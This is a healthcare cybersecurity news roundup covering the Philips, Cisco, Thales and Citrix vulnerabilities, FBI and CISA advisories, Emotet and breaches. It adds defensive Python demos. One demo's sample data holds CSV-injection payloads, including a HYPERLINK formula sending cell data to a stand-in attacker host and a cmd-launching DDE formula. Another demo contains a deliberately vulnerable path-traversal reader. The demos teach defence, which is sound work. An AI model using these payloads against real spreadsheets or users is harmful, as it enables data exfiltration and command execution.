Philips Patient Monitoring Devices Found to Have 8 Vulnerabilities

Eight vulnerabilities of low to moderate severity have been found in Philips patient monitoring equipment. An attacker could exploit them to disclose data, cause a denial of service, disrupt patient monitoring, or escape from a restricted, limited-privilege environment.

The following Philips patient monitoring devices are affected:

  • PerformanceBridge Focal Point Version A.01
  • IntelliVue X3 and X2 Versions N and earlier
  • Patient Information Center iX (PICiX) Versions B.02, C.02, and C.03
  • IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and earlier

The 8 Vulnerabilities Identified

CVE-2020-16212 (CVSS base score 6.8/10, Moderate severity): A resource is exposed to the wrong control sphere, which an unauthorized person could use to escape from the restricted, limited-privilege environment. Exploitation requires physical access to an unsecured device.

CVE-2020-16214 (CVSS base score 4.2/10, Moderate severity): User-supplied data is written to a CSV file without neutralizing special elements, so a cell can be interpreted as a formula or command when the file is opened in spreadsheet software (CSV injection).

CVE-2020-16216 (CVSS base score 6.5/10, Moderate severity): The device does not validate, or incorrectly validates, input to ensure it has the properties required to process it safely. Exploitation can cause a denial of service through a system restart.

CVE-2020-16218 (CVSS base score 3.5/10, Low severity): User-controlled input is not properly neutralized before being placed in output that is served as a web page to other users (cross-site scripting). An attacker could exploit the flaw to gain read-only access to patient information.

CVE-2020-16220 (CVSS base score 3.5/10, Low severity): Input is not validated, or is incorrectly validated, for conformance to the expected syntax. An attacker could exploit the flaw to crash the system.

CVE-2020-16222 (CVSS base score 5.0/10, Moderate severity): When a person claims a particular identity, the product does not sufficiently prove that the claim is correct, potentially permitting unauthorized data access.

CVE-2020-16224 (CVSS base score 6.5/10, Moderate severity): When parsing a formatted message or structure, the software does not handle, or incorrectly handles, a length field that is inconsistent with the actual length of the associated data. Exploitation could restart the surveillance station and interrupt monitoring.

CVE-2020-16228 (CVSS base score 6.0/10, Moderate severity): The software does not properly check a certificate's revocation status, so a compromised certificate could be accepted.
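The CSV injection flaw (CVE-2020-16214) is the one on this list that any application exporting user-entered text can reproduce, so here is an added, self-contained example of the defence; this is illustrative code written for this page, not Philips' code, and the patient rows, field names and the "notes" free-text column are constructed for the demo. It shows an export with and without neutralization, plus a check that can be run over an export produced by someone else's code before it is opened in a spreadsheet.

```python
import csv
import io

# Leading characters that spreadsheet applications (Excel, LibreOffice Calc,
# Google Sheets) interpret as the start of a formula. Tab and carriage return
# are included because some applications skip them before looking for "=".
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export. The "notes" field is free text entered by a user,
# which is the path by which a formula reaches the CSV file.
FIELDNAMES = ["patient_id", "name", "notes"]
SAMPLE_ROWS = [
    {"patient_id": "1001", "name": "Smith, John", "notes": "Follow-up in 2 weeks"},
    {"patient_id": "1002", "name": "Doe, Jane",
     "notes": '=HYPERLINK("http://attacker.invalid/?"&A1,"Open chart")'},
    {"patient_id": "1003", "name": "Roe, Richard",
     "notes": "@SUM(1+1)*cmd|' /C calc'!A0"},
]


def neutralize_cell(value):
    """Make one cell safe to open in spreadsheet software.

    A leading formula character is escaped by prefixing a single quote, which
    spreadsheets treat as "this cell is literal text". Negative numbers entered
    as text ("-5") get escaped too; that is the price of not guessing which
    cells are numeric.
    """
    text = str(value)
    if text.startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def export_rows(rows, fieldnames=FIELDNAMES, sanitize=True):
    """Write rows as CSV text. sanitize=False reproduces the vulnerable export
    (cells written as typed); sanitize=True neutralizes every cell and quotes
    every field so a value cannot break out of its cell either."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cleaned = {}
        for name in fieldnames:
            raw = row.get(name, "")
            cleaned[name] = neutralize_cell(raw) if sanitize else str(raw)
        writer.writerow(cleaned)
    return buf.getvalue()


def formula_cells(csv_text):
    """Return (row, column, value) for each cell that still starts with a
    formula prefix. Use it to vet an export from a device or third-party tool
    before handing the file to a spreadsheet."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_PREFIXES):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    print("unsafe export flags:", formula_cells(export_rows(SAMPLE_ROWS, sanitize=False)))
    print("safe export flags:  ", formula_cells(export_rows(SAMPLE_ROWS)))
    print(export_rows(SAMPLE_ROWS))
```

The apostrophe prefix is visible in some viewers, which is a cosmetic cost; the alternative of stripping the leading character silently alters patient data, which is worse in a clinical record.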

Security researchers at ERNW Research GmbH (ERNW, Enno Rey Netzwerke) discovered the vulnerabilities and reported them to Philips. Philips reported them to CISA and other federal agencies under its coordinated vulnerability disclosure policy.

Philips has received no reports of the vulnerabilities being exploited in the wild and will begin issuing updates in 2020. Until those updates are installed, Philips advises users to apply the following mitigations to make exploitation harder:

  • Physically or logically isolate the vulnerable devices from the hospital's local area network (LAN).
  • Use access control lists that restrict access to the patient monitoring network to only the required ports and IP addresses.
  • Reduce exposure by not running the SCEP service unless it is actively being used to enroll new devices.
  • When enrolling new devices with SCEP, enter a unique, randomly generated challenge password of 8-12 digits.
  • Physically secure the devices to prevent unauthorized login attempts, and keep servers in secured data centers.
  • Restrict access to patient monitors at nurses' stations.
  • Do not permit remote access to PIC iX servers unless it is needed; when it is, enable it only for as long as required.
  • Follow the principle of least privilege and allow only trusted users to access bedside monitors.
  • Contact the local or regional Philips service support team for more information on upgrading vulnerable patient monitoring devices and implementing the mitigations.

CISA Publishes Technical Guidance on Discovering and Responding to Malicious Network Activity

The Cybersecurity and Infrastructure Security Agency (CISA) has released guidance for network defenders and incident response teams on identifying malicious activity and remediating cyberattacks. It offers recommendations for uncovering malicious activity and detailed information on investigating suspected security incidents and securing compromised systems.

The guidance is intended to improve incident response among partners and network administrators and to serve as a playbook for incident investigation. It helps incident response teams collect the data needed to investigate suspicious activity across the network, gather host-based artifacts, perform host and network analysis, and take appropriate steps to mitigate an attack.

The document was produced jointly with cybersecurity agencies in the United States, United Kingdom, Canada, Australia, and New Zealand, and gives security staff technical guidance on identifying in-progress malicious activity and containing it while minimizing its potential adverse effects.

When incident response teams identify malicious activity, the focus is often on cutting off the attacker's access to the network. Ending a threat actor's access to a device or network is crucial, but it is equally important to follow a process that does not alert the attacker that their presence has been discovered.

Although well intentioned, some containment steps can do harm: they can alter volatile data that would have shown what the attacker did, and they can tip the attacker off that the organization knows about the compromise, prompting them either to cover their tracks or to take more damaging action (such as deploying ransomware).

When responding to a suspected attack, the first requirement is to collect and preserve the artifacts, logs, and data that will allow a thorough analysis of the incident. If these are not captured before mitigations are applied, the data can simply be lost, hindering any investigation of the breach. Systems must also be secured, since a threat actor who realizes the attack has been discovered may change tactics. Once systems are protected and artifacts collected, mitigation can proceed, carefully, so as not to alert the threat actor that their presence has been identified.

Whenever suspicious activity is detected, CISA recommends seeking support from a third-party cybersecurity firm. Such firms have the expertise to remove an attacker from a system and to ensure that the weaknesses that could be used in further breaches are fixed before the incident is remediated and closed.

Investigating a breach requires several technical methods to uncover malicious activity. CISA suggests searching for known indicators of compromise (IoCs), using verified IoCs from a wide variety of sources. Frequency analysis helps find anomalous activity: network defenders should establish normal traffic patterns on the network and on hosts, then use them to spot inconsistent activity. Algorithms can flag activity that does not fit normal patterns by detecting variance in timing, source and destination location, port usage, protocol compliance, file location, integrity (via hash), file size, naming convention, and other characteristics.

Pattern analysis helps find automated activity by malware and malicious scripts, as well as regular, repeated actions by human threat actors. An analyst review should also be carried out, based on the security team's knowledge of how the systems are administered, to identify errors in the collected artifacts and discover anomalous activity that may indicate attacker presence.
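The frequency and pattern analysis the guidance describes can be reduced to a few lines of code once a baseline of connection records exists. The following is an added example written for this page, not code from CISA's guidance: it parses a constructed log of outbound connections (timestamp, source, destination, port, bytes), flags source/destination pairs whose inter-arrival timing is suspiciously regular (pattern analysis, the signature of a scheduled callback), and lists destinations that only one host on the network ever contacts (frequency analysis). The log format, the hosts, and the thresholds are assumptions; the sample deliberately contains one host calling back to one address roughly every five minutes.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample of outbound connection records, one per line:
# "<ISO timestamp> <source IP> <destination IP> <destination port> <bytes>".
# 10.1.1.5 contacts 203.0.113.9 every ~300 s (a beacon); the rest is
# ordinary, irregular browsing to 198.51.100.20 plus one odd connection.
SAMPLE_LOG = """\
2020-09-01T10:00:00 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:00:13 10.1.1.6 198.51.100.20 443 14020
2020-09-01T10:01:40 10.1.1.6 198.51.100.20 443 3300
2020-09-01T10:02:00 10.1.1.5 198.51.100.20 443 8800
2020-09-01T10:02:03 10.1.1.5 198.51.100.20 443 120
2020-09-01T10:03:00 10.1.1.7 198.51.100.20 443 2200
2020-09-01T10:05:01 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:07:05 10.1.1.6 198.51.100.20 443 990
2020-09-01T10:07:06 10.1.1.6 198.51.100.20 443 41000
2020-09-01T10:09:59 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:11:11 10.1.1.7 192.0.2.77 8443 77
2020-09-01T10:15:00 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:19:30 10.1.1.5 198.51.100.20 443 6100
2020-09-01T10:20:02 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:22:50 10.1.1.6 198.51.100.20 443 18000
2020-09-01T10:24:58 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:28:45 10.1.1.7 198.51.100.20 443 2500
2020-09-01T10:30:00 10.1.1.5 203.0.113.9 443 512
2020-09-01T10:33:10 10.1.1.6 198.51.100.20 443 700
2020-09-01T10:35:01 10.1.1.5 203.0.113.9 443 512
"""


def parse_log(text):
    """Turn the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, size = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
                       "port": int(port), "bytes": int(size)})
    return events


def beacon_candidates(events, min_events=6, max_cv=0.15):
    """Pattern analysis: flag (src, dst) pairs whose timing is too regular.

    The coefficient of variation (stdev / mean) of the gaps between
    connections is close to zero for a scheduled callback and large for
    human-driven traffic. Returns (src, dst, mean_gap_s, cv), lowest cv first.
    """
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["dst"])].append(e["ts"])
    found = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_events:       # too few samples to judge timing
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            found.append((src, dst, round(mean, 1), round(cv, 3)))
    return sorted(found, key=lambda f: f[3])


def rare_destinations(events, max_sources=1):
    """Frequency analysis: destinations contacted by very few hosts.

    A destination only one host ever talks to deserves an analyst's look.
    The baseline here is the sample itself; in practice it is days of
    known-normal traffic.
    """
    sources = defaultdict(set)
    for e in events:
        sources[e["dst"]].add(e["src"])
    return sorted(dst for dst, srcs in sources.items() if len(srcs) <= max_sources)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    for src, dst, mean, cv in beacon_candidates(evts):
        print(f"beacon? {src} -> {dst} every {mean}s (cv={cv})")
    print("rare destinations:", rare_destinations(evts))
```

Real beacons add jitter, so the threshold on the coefficient of variation has to be tuned against the organization's own traffic; the point of the example is that timing regularity and destination rarity are measured against a baseline rather than against a list of known-bad addresses.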

The guidance describes several common mistakes made when responding to incidents and provides technical measures and guidelines for the investigation and remediation processes.

CISA also makes general recommendations on defensive strategies and programs that make it harder for an attacker to gain access to a system and remain there undetected. These measures may not prevent an attacker from compromising a network, but they help slow an attack, giving incident response teams the time they need to recognize and react to it.

The CISA guidance, Technical Approaches to Uncovering and Remediating Malicious Activity (AA20-245A), is available from CISA.

Zero-Day Vulnerabilities Found in IOS XR Software Used by Cisco Carrier-Grade Routers

Hackers are actively exploiting two zero-day vulnerabilities in the IOS XR software used in Cisco Network Convergence System (NCS) carrier-grade routers. Cisco detected the first attempts to exploit the vulnerabilities on August 25, 2020.

Cisco has not yet released patches, but there are ways to reduce the chances of exploitation.

The vulnerabilities, CVE-2020-3566 and CVE-2020-3569, lie in the Distance Vector Multicast Routing Protocol (DVMRP) feature. They affect all Cisco devices running IOS XR with multicast routing enabled on an interface. Multicast routing saves bandwidth by sending a single stream of data to several recipients.

An unauthenticated remote attacker can exploit the vulnerabilities by sending crafted Internet Group Management Protocol (IGMP) packets to an affected device, consuming its process memory. Successful exploitation leads to memory exhaustion and a denial of service, which can destabilize other processes such as the interior and exterior routing protocols.

The vulnerabilities have a CVSS v3 base score of 8.6 out of 10, indicating a high risk. Patches should be applied as soon as they are released; in the meantime, Cisco has suggested mitigations (not complete workarounds) that reduce the risk of exploitation.

Administrators of vulnerable Cisco products should rate-limit IGMP traffic. To do so they first need to know the normal IGMP traffic rate, so that the limit can be set below the current average. Rate limiting does not prevent exploitation, but it slows the attack and gives administrators more time to carry out recovery steps.

To help block attacks, administrators can also add an access control entry (ACE) to an existing interface access control list (ACL), or create a new ACL for a specific interface, that denies inbound DVMRP traffic on that interface.

Cisco has published a security advisory explaining how to determine whether multicast routing is enabled on a device and how to implement the mitigations, and it is working on patches that will fix the vulnerabilities.

Millions of Devices Impacted by Vulnerability Found in Thales Wireless IoT Modules

A vulnerability has been identified in a component used in a very large number of IoT devices. Hackers could exploit it to steal sensitive data and manipulate vulnerable devices to attack internal networks. More than 30,000 companies use Thales components across a wide range of industries, including energy, telecommunications, and healthcare.

The vulnerability is in the Cinterion EHS8 M2M module and several related products (BGS5, EHS5/6/8, ELS61, ELS81, PDS5/6/8, PLS62). These embedded modules provide processing power and let devices send and receive data over wireless mobile connections. They also serve as a secure store for sensitive data such as credentials, passwords, and operational code. The vulnerability could allow an attacker to access the files in that store.

Researchers at IBM X-Force Red found a way to bypass the security that protects the code and data on the EHS8 module. The module stores the device's Java code, which often contains confidential material such as encryption keys, passwords, and certificates.

An attacker exploiting the vulnerability could potentially compromise hundreds of thousands of devices and, by pivoting through the provider's backend network, reach the networks or VPNs that support those devices. The attacker could thus obtain credentials, passwords, intellectual property, and encryption keys. Information stolen from the modules could also be used to manipulate a device or to reach the central control system and carry out further attacks, in some cases remotely over 3G.

In medical devices, exploitation could allow readings from patient monitors to be altered, either to create false alerts or to hide critical changes in a patient's vital signs. Changes to a drug pump could deliver an overdose or stop the dose of a critical medication.

The researchers also note that the vulnerability in smart meters used by energy companies could be exploited to misreport energy consumption. That would produce higher or lower bills, but if an attacker controlled enough devices, it could damage the grid and cause blackouts.

The researchers discovered the vulnerability, tracked as CVE-2020-15858, in September 2019 and notified Thales immediately. Thales worked with IBM X-Force Red to develop, test, and deliver a patch, which became available in February 2020. Thales is making sure its customers know about the patch so they can apply it promptly.

Device manufacturers are taking time to apply the patch, and patching is noticeably slower for devices used in highly regulated industries. Medical devices, for example, require recertification after patching, which is a lengthy process.

Addressing the vulnerability is largely in the hands of device manufacturers, who need to prioritize patching. IBM X-Force Red says the patching effort has been under way for six months, yet many devices remain vulnerable. Patches can be applied either through a USB device connected directly to the vulnerable device using the management system, or through a remote update. Remote updating is preferable, but it depends on whether the device has internet access.

Patches Available to Resolve Critical Vulnerabilities in Citrix Endpoint Management / XenMobile Server

Two critical vulnerabilities, tracked as CVE-2020-8208 and CVE-2020-8209, have been identified in Citrix Endpoint Management (CEM), also known as XenMobile Server. An unauthenticated attacker could exploit them to obtain domain account credentials, take full control of a vulnerable XenMobile Server, and gain access to email, VPNs, and web applications holding sensitive company and patient records.

Many businesses use CEM/XenMobile Server to manage employees' mobile devices, push updates, control security settings, and support in-house applications. The nature of the vulnerabilities means attackers could develop exploits quickly, so prompt patching is essential.

Details have been released only for the critical vulnerability CVE-2020-8209. It is a path traversal flaw caused by insufficient input validation. An unauthenticated attacker who exploits it can read arbitrary files from the application running on the server, including configuration files, and could thereby obtain the encryption keys used to protect sensitive data. The vulnerability can be exploited by persuading a user to visit a specially crafted web page.
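Path traversal from insufficient input validation is a flaw class worth seeing side by side with its fix. The following is an added example written for this page, not Citrix's code and not a reproduction of CVE-2020-8209: it builds a constructed web root in a temporary directory (a public page plus a config file holding a constructed LDAP bind password), then shows a file handler that joins the client-supplied name straight onto the base directory next to one that resolves the final path and refuses anything outside the base.

```python
import os
import tempfile


def build_sample_tree():
    """Create a constructed web root: public files plus a config directory
    that the file handler should never be able to reach."""
    root = tempfile.mkdtemp(prefix="traversal_demo_")
    public = os.path.join(root, "public")
    config = os.path.join(root, "config")
    os.makedirs(public)
    os.makedirs(config)
    with open(os.path.join(public, "index.html"), "w") as f:
        f.write("<html>ok</html>")
    secret = "ldap.bind.password=Hunter2!\n"   # constructed, demo only
    with open(os.path.join(config, "app.properties"), "w") as f:
        f.write(secret)
    return public, secret


PUBLIC_DIR, SECRET = build_sample_tree()


def read_file_vulnerable(base_dir, requested):
    """Insufficient input validation: the client-supplied name is joined to
    the base directory and opened as-is. "../" climbs out of base_dir, and an
    absolute path makes os.path.join discard base_dir entirely."""
    path = os.path.join(base_dir, requested)
    with open(path) as f:
        return f.read()


def read_file_safe(base_dir, requested):
    """Resolve the final path and refuse anything outside base_dir.

    realpath() collapses "..", "." and symlinks, so the check is made on the
    file that would actually be opened, not on the string the client sent.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path traversal rejected: {requested!r}")
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    print("vulnerable:", read_file_vulnerable(PUBLIC_DIR, "../config/app.properties").strip())
    try:
        read_file_safe(PUBLIC_DIR, "../config/app.properties")
    except ValueError as err:
        print("safe:", err)
    print("safe:", read_file_safe(PUBLIC_DIR, "index.html"))
```

Checking for the substring ".." in the request is the common half-fix; it misses absolute paths, URL-encoded dots, and symlinks inside the web root, all of which the realpath-then-commonpath check handles because it validates the resolved file rather than the request string.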

Andrey Medov of Positive Technologies, who discovered the vulnerability, said it lets hackers obtain data that can be used to breach the perimeter, since the configuration file usually stores the credentials of the domain account used for LDAP access. With domain account access, a remote attacker can obtain authentication data for other external resources of the organization, such as corporate email, VPN, and web applications. An attacker who reads the configuration file could also obtain other sensitive information, including a database password.

Three further vulnerabilities, rated medium and low severity, have also been identified. Citrix has not released details of these vulnerabilities, tracked as CVE-2020-8210, CVE-2020-8211, and CVE-2020-8212.

The critical vulnerabilities affect the following versions:

XenMobile Server 10.12 prior to RP2
XenMobile Server 10.11 prior to RP4
XenMobile Server prior to 10.9 RP5
XenMobile Server 10.10 prior to RP6

The medium and low severity vulnerabilities affect the following versions:

XenMobile Server 10.12 prior to RP3
XenMobile Server prior to 10.9 RP5
XenMobile Server 10.11 prior to RP6
XenMobile Server 10.10 prior to RP6

Citrix believes attackers will quickly develop exploits and begin attacking the vulnerabilities, so it strongly recommends patching promptly.

Citrix has released patches for XenMobile Server versions 10.9, 10.10, 10.11, and 10.12. Customers running XenMobile Server 10.9.x should first upgrade to a supported version before applying the patch; Citrix recommends upgrading to 10.12 RP3. XenMobile cloud versions are updated automatically, so no action is needed for them.

FBI Urges Companies to Upgrade Windows 7 Devices to a Supported OS

The FBI Cyber Division has issued a Private Industry Notification advising businesses still running Windows 7 to migrate to a supported operating system, because of the risk that vulnerabilities in Windows 7 will be exploited.

The FBI has observed an increase in cyberattacks on operating systems once they reach end of life. Any company still using Windows 7 faces a greater risk of cybercriminals exploiting it to gain remote network access, because security updates are no longer provided while new vulnerabilities continue to be discovered.

Windows 7 reached end of life on January 14, 2020. Since then, Microsoft has stopped releasing free patches for newly identified vulnerabilities. Security updates are offered only for Windows 7 Enterprise, Professional, and Ultimate, and only to customers enrolled in the Extended Security Update (ESU) program, which runs until January 2023. The cost of ESU rises the longer a customer stays in the program. Although security updates continue for ESU customers, the FBI and Microsoft strongly recommend upgrading from Windows 7 to Windows 10 or another supported operating system.

Upgrading an operating system is not easy and may require buying new hardware. New software has a cost, but it is small compared with the cost of losing intellectual property and the ongoing risk of running an unsupported operating system.

Many companies around the world still run Windows 7 on some of their Windows devices. Statcounter data shows that about 20% of all Windows devices still run Windows 7, even though free security updates are no longer issued. An open-source report published in May 2019 found that 71% of Windows devices used in healthcare ran Windows 7 or other operating systems that became unsupported in January 2020. The FBI warned that successful cyberattacks on healthcare increase once operating systems reach end of life.

The FBI said cybercriminals are looking for ways to access legacy Windows operating systems in order to use Remote Desktop Protocol (RDP) exploits. In May 2019, after the BlueKeep vulnerability was discovered, Microsoft released patches for all supported operating systems and also for Windows XP and other unsupported systems, to prevent a WannaCry-style attack. Since the vulnerability was disclosed, working exploits have been developed, and attacks on unpatched Windows devices continue.

More vulnerabilities will be identified and exploited in unpatched operating systems. When Microsoft released the MS17-010 patch for several SMBv1 vulnerabilities in March 2017, many companies failed to apply it despite the high risk of exploitation. In May 2017 the WannaCry ransomware attacks began, and 98% of the infected systems were running Windows 7.

With a supported OS, patches are made available promptly to fix newly discovered vulnerabilities. Running a supported OS is the single most important step for improving security.

Protecting against cybercriminals requires a layered approach, including validating the software running on the computer systems and reviewing access controls and network configuration.

Besides upgrading the operating system and applying patches promptly, companies should install antivirus software, use spam filters, and deploy firewalls, all properly configured and kept up to date.

Network configuration should be reviewed and out-of-date computer systems identified. The FBI also recommends auditing network systems that use RDP and closing unused RDP ports, implementing two-factor authentication wherever possible, and logging all RDP login attempts.

Any Windows 7 device that cannot be upgraded or isolated should have its internet access blocked, and the company should enroll it in Microsoft's ESU program.

Allergy and Asthma Clinic of Fort Worth Hacking Incident Impacts 69,777 Patients

Allergy and Asthma Clinic of Fort Worth has discovered that an unauthorized person gained access to its computer systems and potentially obtained patients' billing information. The clinic detected the incident on June 4, 2020 and immediately took steps to prevent further unauthorized access. The breach investigation found that the attacker first gained access to the network on May 20, 2020.

A review of the affected systems showed that the attacker may have accessed records containing patients' names, phone numbers, addresses, dates of birth, Social Security numbers, insurance information, and the reasons for their appointments.

Cybersecurity experts have been engaged to review the clinic's security measures, and additional safeguards will be implemented as necessary to strengthen network security and prevent further data breaches.

The breach report filed with the Department of Health and Human Services' Office for Civil Rights states that 69,777 individuals were affected.

Chinese Hackers Targeted Biotech Company Studying COVID-19 Vaccine

Hackers targeted the Massachusetts-based biotech company Moderna in search of COVID-19 research data. Moderna has been developing a COVID-19 vaccine and announced its vaccine candidate in January. Reuters reported that the company detected "information reconnaissance activities" in January and contacted the FBI about the suspected attack.

The company is believed to have been targeted by the Chinese hackers indicted by the Department of Justice in July for an 11-year campaign of cyber espionage against companies and government institutions in the U.S.

The reconnaissance is thought to have been an attempt to steal information related to Moderna's mRNA COVID-19 vaccine, which recently entered a phase III clinical trial.

Moderna says it remains highly vigilant about potential cybersecurity threats, maintaining an internal team, external support services, and good working relationships with outside authorities to continually assess threats and protect its valuable data.

FBI Alert About Malware Backdoors Created by Chinese Tax Software

The FBI has issued a Private Industry Notification warning of the risk of malware infection from Chinese tax software, after two backdoors were found in tax software that the Chinese government requires companies to use. The backdoors were found in software produced by two Chinese firms for processing value-added tax (VAT) payments to the Chinese government. Aisino and Baiwang are the two technology companies approved by the Chinese government to supply the VAT software, and any firm doing business in the PRC must use it.

The FBI alert follows two Trustwave reports on backdoor malware variants named GoldenSpy and GoldenHelper. These backdoors give their operators access to corporate networks, escalate privileges to administrator level, allow theft of intellectual property, execute code remotely, and install additional malware payloads.

Two U.S. companies have already been infected by the backdoors after receiving tax software updates that were rolled out in 2018, following changes to Chinese VAT regulations. The first, a U.S. pharmaceutical company, found the GoldenHelper backdoor on its network in April 2019. An employee had downloaded the Baiwang Tax Control Invoicing software in July 2018, but the backdoor appears to have been introduced only in March 2019, after a software update. In addition to the update to the main tax program, the installation of a driver created the backdoor.

The second company downloaded the Intelligent Tax software from Aisino Corporation. According to a private cybersecurity firm, the GoldenSpy backdoor was most likely introduced by that software, suggesting that GoldenSpy is a newer version of GoldenHelper.

The FBI identified the businesses most at risk as those in the finance, healthcare, and chemical sectors, since state-sponsored hackers have targeted them in the past. The FBI did not accuse China of adding malware to the software, but it noted that a state-owned enterprise, NISEC (National Information Security Engineering Center), which has links to China's People's Liberation Army, oversees the two Chinese firms.

The warning came after a number of companies that read the two Trustwave reports revealed that they too had been infected with the malware.

Emotet Botnet Reactivated and Sending Huge Volumes of Malicious Emails

After five months of dormancy, the Emotet botnet has been reactivated and is being used to send large volumes of spam email to companies in the United Kingdom and the United States.

The Emotet botnet is a network of compromised computers infected with the Emotet malware. Emotet is an information stealer and malware downloader that has been used to distribute various banking Trojans, including TrickBot.

Emotet hijacks email accounts and uses them to send spam containing malicious hyperlinks and attachments, typically Word and Excel files with malicious macros. When the macros run, they launch a PowerShell script that silently downloads the Emotet malware. Emotet can also spread to other devices on the network, and every infected device becomes part of the botnet.

The emails in this campaign resemble those of earlier campaigns. They use simple but effective lures aimed at businesses, usually fake invoices, purchase orders, shipping notifications, and receipts. The messages often contain just a single line of text asking the recipient to click a link or open the attachment. They are commonly personalized with the name of the targeted business and usually carry a subject line beginning "RE:", suggesting a reply to an earlier email from the recipient, for example "RE: Invoice 422132". Some emails in this campaign carry an attachment named "electronic.form".
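The lure traits just described (a "RE:" subject with no real thread behind it, a one-line body, a macro-capable Office attachment or an attachment with an unusual name) can be turned into a triage score on the mail gateway or in the SOC. The following is an added example written for this page, not vendor or Proofpoint code: it constructs three sample messages with Python's standard email library (two modelled on the campaign, one benign reply with a PDF), parses them back as .eml text, and scores them. The scoring weights, the set of "expected" attachment types, and the sender and recipient addresses are assumptions for the demo.

```python
import email
from email import policy
from email.message import EmailMessage

# Attachment types that can carry VBA macros, Emotet's usual delivery vehicle.
MACRO_CAPABLE = {".doc", ".docm", ".dot", ".dotm", ".xls", ".xlsm", ".xlsb", ".xlam"}
# Types the business is assumed to receive routinely (demo assumption).
EXPECTED = {".pdf", ".png", ".jpg", ".txt"}


def build_message(subject, body, attachment_name, in_reply_to=None):
    """Construct a sample .eml string for the demo (not a captured message)."""
    msg = EmailMessage()
    msg["From"] = "accounts@partner.example"
    msg["To"] = "ap@hospital.example"
    msg["Subject"] = subject
    if in_reply_to:                      # a genuine reply carries threading headers
        msg["In-Reply-To"] = in_reply_to
        msg["References"] = in_reply_to
    msg.set_content(body)
    msg.add_attachment(b"\x00placeholder bytes\x00", maintype="application",
                       subtype="octet-stream", filename=attachment_name)
    return msg.as_string()


def triage(raw_message):
    """Score one message against the lure traits; higher means more suspicious.

    Returns {"score": int, "reasons": [...]}. Thresholds are assumptions and
    should be tuned against the organization's own mail flow.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    score, reasons = 0, []

    subject = (msg["Subject"] or "").strip().lower()
    if subject.startswith(("re:", "fw:", "fwd:")) and not (msg["In-Reply-To"] or msg["References"]):
        score += 1
        reasons.append("reply-style subject with no In-Reply-To/References header")

    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part else ""
    lines = [line for line in body.splitlines() if line.strip()]
    if len(lines) <= 2:
        score += 1
        reasons.append("body is one or two lines")
    if "http://" in body or "https://" in body:
        score += 1
        reasons.append("body carries a link")

    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = name[name.rfind("."):] if "." in name else ""
        if ext in MACRO_CAPABLE:
            score += 2
            reasons.append(f"macro-capable Office attachment: {name}")
        elif ext not in EXPECTED:
            score += 1
            reasons.append(f"unexpected attachment type: {name}")
    return {"score": score, "reasons": reasons}


# Constructed samples modelled on the campaign described above.
LURE_DOC = build_message("RE: Invoice 422132", "Please see the attached invoice.",
                         "Invoice_422132.doc")
LURE_FORM = build_message("RE: Purchase order", "Open the attached form to confirm.",
                          "electronic.form")
BENIGN = build_message("Re: Meeting notes",
                       "Hi team,\n\nNotes from today attached.\n\nThanks,\nSam",
                       "notes.pdf", in_reply_to="<abc123@hospital.example>")

if __name__ == "__main__":
    for label, raw in (("lure .doc", LURE_DOC), ("lure .form", LURE_FORM), ("benign", BENIGN)):
        print(label, triage(raw))
```

The score is a triage aid, not a verdict: a score of 3 or more is a reasonable threshold for quarantining the message and detonating the attachment in a sandbox, while the benign reply scores zero because the threading headers and multi-line body are present.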

Several security companies detected the latest campaign. The first test emails were sent on July 13, and the spam campaign began on July 17. Proofpoint observed 30,000 messages on July 17; around 250,000 emails are now being sent each day.

Malwarebytes rated Emotet the biggest malware threat of 2018 and 2019, despite regular gaps in botnet activity. Activity usually pauses around holidays for days or weeks, but the latest hiatus was the longest break since the malware first appeared.

Emotet is dangerous in itself, but the secondary payloads it downloads cause the most damage. The TrickBot Trojan is modular malware with a range of malicious capabilities, including stealing credentials, sensitive documents, emails, and Bitcoin wallets. TrickBot frequently downloads Ryuk ransomware once its operators have achieved their own objectives.

When Emotet is detected, a rapid response is needed to isolate the infected device and remove the malware. If Emotet is found on one device, other devices have probably been compromised as well.

To reduce the risk of infection, companies should send an advisory to staff warning them of the threat and urging extra caution, particularly with emails carrying Word and Excel attachments, even when those emails appear to come from trusted contacts.

Critical Vulnerabilities Identified in the OpenClinic GA Integrated Hospital Information Management System

Twelve vulnerabilities have been identified in OpenClinic GA, an open-source integrated hospital information management system.

Hospitals and clinics use OpenClinic GA to manage financial, administrative, clinical, pharmacy, and laboratory workflows. It is also used for outpatient and inpatient management, medical billing, ward management, bed management, and other hospital operations.

The vulnerabilities were discovered by Brian D. Hysell. Three are rated critical and six high severity. An attacker exploiting them could bypass authentication, access confidential data, view or modify database information, and execute code remotely.

The vulnerabilities can be exploited by an attacker with a low skill level, and several are remotely exploitable. Public exploits are available for some of them. Their CVSS v3 base scores range from 5.4 to 9.8.

